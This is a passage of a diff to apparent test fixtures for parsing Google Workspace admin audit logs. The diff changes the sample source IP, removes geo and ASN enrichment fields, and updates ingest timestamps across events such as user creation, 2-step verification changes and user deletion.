"event": { - "ingested": "2021-06-09T10:57:26.301314700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005092900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESET_SIGNIN_COOKIES", "id": "1", @@ -4321,7 +3439,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4345,35 +3463,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301316300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005096800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SECURITY_KEY_REGISTERED_FOR_USER", "id": "1", @@ -4410,7 +3510,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4434,35 +3534,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301318200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005100700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_SECURITY_KEY", "id": "1", @@ -4498,7 +3580,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4522,35 +3604,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301320200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005104600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_INVITE", "id": "1", @@ -4581,7 +3645,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4605,35 +3669,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301321900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005107800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "VIEW_TEMP_PASSWORD", "id": "1", @@ -4665,7 +3711,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4689,35 +3735,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301323600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005112Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TURN_OFF_2_STEP_VERIFICATION", "id": "1", @@ -4754,7 +3782,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4778,35 +3806,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301325300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005117600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNBLOCK_USER_SESSION", "id": "1", @@ -4843,7 +3853,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4867,35 +3877,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301326900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005123Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_TITANIUM", "id": "1", @@ -4932,7 +3924,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4956,35 +3948,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301328700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005129100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ARCHIVE_USER", "id": "1", @@ -5020,7 +3994,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5044,35 +4018,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301330400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005134200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_BIRTHDATE", "id": "1", @@ -5104,7 +4060,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5128,35 +4084,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301332200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005139500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CREATE_USER", "id": "1", @@ -5193,7 +4131,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5217,35 +4155,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301333900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005143400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_USER", "id": "1", @@ -5282,7 +4202,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5306,35 +4226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301335800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005146800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DOWNGRADE_USER_FROM_GPLUS", "id": "1", @@ -5371,7 +4273,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5395,35 +4297,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301337600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005150900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_ENROLLED_IN_TWO_STEP_VERIFICATION", "id": "1", @@ -5459,7 +4343,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5478,35 +4362,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301339200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}", + "ingested": "2021-12-09T13:38:57.005155900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}", "provider": "admin", "action": "DOWNLOAD_USERLIST_CSV", "id": "1", @@ -5536,7 +4402,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5558,35 +4424,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301340900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005160600Z", + "original": 